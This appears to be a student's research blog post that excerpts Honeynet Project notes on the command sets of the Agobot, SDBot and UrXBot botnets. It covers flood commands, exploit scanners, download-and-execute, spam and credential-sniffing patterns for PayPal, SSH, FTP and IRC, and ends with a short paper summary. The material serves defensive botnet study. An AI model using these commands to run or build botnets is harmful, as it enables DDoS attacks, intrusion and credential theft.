Agobot, SDbot, URXbot Sample Commands

Excerpt from http://www.honeynet.org/book/export/html/50

A good look into the basic configurations and commands for three common Bots. I think that given the time frame and desire to produce admirable results (having to complete a background check I can not yet deploy a Honeynet on University property, this should be accomplished by the middle of next week). Having looked at the current research and the various advances and deficits, I am greatly considering looking into the updating behavior and cycles of various Botnets. Research in this realm should be very conducive towards better arming It personnel in that more effective IDS and IPS systems can be implemented if network admins are more knowledgeable about the evolution, and progressive algorithm enhancement of various bots categorized by attack type, cloning strategy, host IP ranges, lifespan, and update cycle. If a trend emerges in the data gathered that can accurately predict what type of bot is most likely going to connect to which one of your ports and with what command, a much tighter filter can be placed allowing for administrators to better capture the Botnet types they desire to study. Research in this realm could also make for more predictable server stability in the long run by providing data for optimized server updating schedules. Of course the desires and objectives of each given party are different and thus configurations based on acquired data would be user specific. A second realm in which I tend to gather data is on the various bots ability to remain connected while various port configurations are enacted. I have not yet seen enough satisfying data on this topic, although scanning mechanisms and “most frequent port lists” are known, I want to determine if any of the Bots are intelligent enough to connect to more stable ports by either randomly selecting ports to attempt connection or by algorithmic sequencing. This activity would have to be monitored during a live session with an intrusive Bot facing massive disconnections and reopening of ports. Hopefully comprehensible and applicable port sequences do emerge that can help distinguish extremely well programmed Bots and allow for further study into the most elite Botnets.

In the following, we cover the more popular commands implemented in the common bots we have captured in the wild. Presenting all the commands is beyond the scope of this paper, as Agobot comes along with over 90 commands in the default configuration.

1. DDoS something
* Agobot
o ddos.stop
stops all floods
o ddos.phatwonk [host] [time] [delay]
starts leet flood
Starts a SYN-flood on ports 21,22,23,25,53,80,81,88,
110,113,119,135,137,139,143,443,445,1024,1025,1433,
1500,1720,3306,3389,5000,6667,8000,8080

o ddos.phatsyn [host] [time] [delay] [port]
starts syn flood
o ddos.phaticmp [host] [time] [delay]
starts icmp flood
o ddos.synflood [host] [time] [delay] [port]
starts an SYN flood
o ddos.updflood [host] [port] [time] [delay]
start a UDP flood
o ddos.targa3 [host] [time]

start a targa3 flood
Implements the well known DDoS attack Mixter authored in 1999.

/*
* targa3 – 1999 (c) Mixter
*
* IP stack penetration tool / ‘exploit generator’
* Sends combinations of uncommon IP packets to hosts
* to generate attacks using invalid fragmentation, protocol,
* packet size, header values, options, offsets, tcp segments,
* routing flags, and other unknown/unexpected packet values.
* Useful for testing IP stacks, routers, firewalls, NIDS,
* etc. for stability and reactions to unexpected packets.
* Some of these packets might not pass through routers with
* filtering enabled – tests with source and destination host
* on the same ethernet segment gives best effects.
*/
taken from
http://packetstormsecurity.org/DoS/targa3.c

o ddos.httpflood [url] [number] [referrer] [recursive = true||false]
starts a HTTP flood
This is real nasty since it fetches websites from a webserver.
If “recursive” is set, the bot parses the replies and follows
links recursively.
* SDBot
o syn [ip] [port] [seconds|amount] [sip] [sport] [rand] (sdbot 05b pure version)
o udp [host] [num] [size] [delay] [[port]]size (sdbot 05b ago version)
o ping [host] [num] [size] [delay]num
* UrXbot
o ddos.(syn|ack|random) [ip] [port] [length]
o (syn|synflood) [ip] [port] [length]
o (udp|udpflood|u) [host] [num][ [size] [delay] [[port]]
o (tcp|tcpflood) (syn|ack|random) [ip] [port] [time]
o (ping|pingflood|p) [host] [num][ [size] [delay]
o (icmpflood|icmp) [ip] [time]
o ddos.stop
o synstop
o pingstop
o udpstop
2. Spreading
* Agobot
o scan.addnetrange [255.255.255.255/32] [priority]
o scan.delnetrange [255.255.255.255/32]
o scan.listnetrangeslist scanned netranges
o scan.clearnetrangesclears netrange
o scan.resetnetranges
removes all netranges from scanner and adds local LAN as scanning range
o scan.enable [scanner]
[scanner] can be one of
Anubis Bagle CPanel DCOM DCOM2 Doom DW Ethereal HTTP Locator LSASS NetBios Optix SQL UPNP WKS
o scan.disable [scanner]
[scanner] can be the same as above
o scan.startall
starts all scanners
o scan.stopall
stops all scanners
o scan.start
starts all enabled scanners
o scan.stop
stops all scanners
o scan.stats
replys stats about exploitings per scanner
o scan.host [255.255.255.255[:port]]
If given with port, just tries to exploit the host with the scanners fitting the ports, else all scanners are used.
* SDBot & UrXBot
o (scanall|sa)
o (scanstats|stats)
o scandel [port|method]
[method] can be one of webdav ntpass netbios dcom135 dcom445 dcom1025 dcom2 iis5ssl mssql beagle1 beagle2 mydoom lsass_445 lsass_139 optix upnp netdevil DameWare kuang2 sub7
o scanstop
o (advscan|asc) [port|method] [threads] [delay] [minutes]
3. Downloading files from the internet
* Agobot
o http.download
download a file via HTTP
o http.execute
updates the bot via the given HTTP URL
o http.update
executes a file from a given HTTP URL
o The same commands are also available via FTP
* SDBot & UrXBot
o (update|up) [url] [botid]
o (download|dl) [url] [[runfile?]] [[crccheck]] [[length]]
4. Local file IO
* SDBot & UrXBot
o (execute|e) [path]
o (findfile|ff) filename
o (rename|mv) [from] [to]
o findfilestopp
5. Sending Spam
* Agobot
o cvar.set spam_aol_channel [channel]
AOL Spam – Channel name
o cvar.set spam_aol_enabled [1/0]
AOL Spam – Enabled?
o cvar.set spam_maxthreads [8]cvar
Spam Logic – Number of threads
o cvar.set spam_htmlemail [1/0]”true”,

Spam Logic – Send HTML emails
o cvar.set aolspam_maxthreads [8]
AOL Spam Logic – Number of threads
o spam.setlist
downloads list with email-addresses to spam them
o spam.settemplate
downloads an email template
o spam.start
starts the spamming
o spam.stop

stops the spamming
o aolspam.setlist
AOL Spam – downloads an email list
o aolspam.settemplate
AOL – downloads an email template
o aolspam.setuser
AOL – sets an username
o aolspam.setpass
AOL – sets a password
o aolspam.start

AOL – starts the spamming
o aolspam.stop
AOL – stops the spamming
* SDBot
So far, SDBot does not implement dedicated spamming
methods. But other options to send spam are possible:
The spammer uses the “download” command to download
and execute a SOCKSv4/v5 server. The server publishes
his IP-address and SOCKS-port at a file on a
webserver. Via this backdoor, spam can be sent.

* UrXBot
o email [server] [port] [srcmail] [dstmail] [mailsubj]
6. Sniffing
* Agobot
Agobots sniffing is really “advanced”: If you compile
the bot with sniffing enabled, it drops a stripped
down lipcpap dll on startup and registers it as system
driver. The sniffing thread then uses libpcre to
lookout for bot commands

o HTTP
Commented: Like paypals? ;-D How about cookies? YUMMEH! -rain

Checks for “PAYPAL” “SET-COOKIE”
o SSH
Commented: I dont get the idea, but the famous lsass author Nils contributed this and comments it
// SSH – works – after the RSA key is sent, the login and pass is sent raw. Believe me. -Nils
Checks for “login as:” “password:” “putty” “SECURECRT”
o CPANEL
Commented: Like configuring Domains ? Here you go ! -Nils
Checks for “cPanel” “Set-Cookie:”
o IRC
Checks for:
“^:(.*)!(.*)@(.*) ((?i)PRIVMSG|NOTICE) (.*) :(.)((?i)login|auth|id|ident|hashin|secure|l) (.*)$”
“^((?i)oper )(.*)”
“^:(.*) 381 (.*) :(.*)”
“^((?i)nickserv identify) (.*)$”
“^:.* ((?i)notice|privmsg) (.*) :Password accepted.*”
Botnet DDoS:
“^:(.*)!(.*)@(.*) ((?i)PRIVMSG|NOTICE) (.*) :(.)((?i)ddos|packet|flood|udp|syn|pfast|coldrage|syn3|syn2|targa|icmp|fuck|random) (.*)$”

o FTP
Checks for:
“^((?i)USER )(.*)”
“^((?i)PASS )(.*)”
“^(230 )(.*)”

o cvar.set sniffer_enabled 1/0
o cvar.set sniffer_channel [destinationchannel]
sets the destinations channel to which the results should be logged
o sniffer.addstring [pcre]
adds a user-defined string to the sniffer
o sniffer.delstring [pcre]
deletes a user-defined string from the sniffer
* SDBot
SDBots sniffing is based on Windows raw socket
listening. Compared to the way Agobots sniffing is
implemented, this way is ineffective and poorly: The
bot even sniffs his own traffic and recognizes it as
sniffed traffic. In addition, SDBot lacks PCRE support
and uses strstr() for comparison.

o HTTP Checks for: paypal PAYPAL paypal.com PAYPAL.COM Set-Cookie:
o IRC
Checks for the following strings: :.login :,login :!login :@login :$login :%login :^login :&login :*login :-login :+login :/login :\\login :=login :?login :’login :`login :~login : login :.auth :,auth :!auth :@auth :$auth :%auth :^auth :&auth :*auth :-auth :+auth :/auth :\\auth :=auth :?auth :’auth :`auth :~auth : auth :.id :,id :!id :@id :$id :%id :^id :&id :*id :-id :+id :/id :\\id :=id :?id :’id :`id :~id : id :.hashin :!hashin :$hashin :%hashin :.secure :!secure :.l :!l :$l :%l :.x :!x :$x :%x :.syn :!syn :$syn :%syn CDKey JOIN # NICK OPER oper now an IRC Operator
o carnivore [on/off]
7. Cloning
* Agobot
o For some reasons our agobot lacks cloning capabilities
* SDBot & UrXBot
o (clone|c) [host] [port] [channel] [[chanpass]]
o clonestop [clonenumber]
o (c_raw|c_r) [clonenumber] [raw irc command]
o (c_mode|c_m) [clonenumber][some irc mode]
o (c_nick|c_n) [clonenumber] [newnick|$randnick]
o

(c_join|c_j) [clonenumber] [channel]
o (c_part|c_p) [clonenumber] [channel]
o (c_privmsg|c_pm) [clonenumber] [dest nick or channel] [msg]
o (c_action|c_a) [clonenumber] [dest nick or channel] [msg]

Advertisements

“Botnet Attack and Analysis” Tynan Wilk

A short paper which discusses the repeated theme of invading IRC chat rooms as a way of attack and detecting potential and existing botnets. The author provides a sample HTTP Get request and details on how to utilize Google as a detection mechanism for discovering vulnerable targets that are likely to become zombies in the future. The paper reaches it’s climax with the author discussing a brief synopsis of what exactly happened upon entry into an IRC chat room in which he had the rare chance to actually speak with one of the “Herders” in person. The herder was actually not threatened at all by the presence of the author(In the sense that he was annoyed rather than alarmed), and banned him leaving him with the statement that the author was a rare and lucky case not to have been infected but that new attacks were being developed so that one day this luck would eventually fade if the author did not keep up with the technology gap between intruder and victim. Quite a few themes seem to be reoccurring in these papers, none of them seem to be indicative of a positive outlook for the future of network security.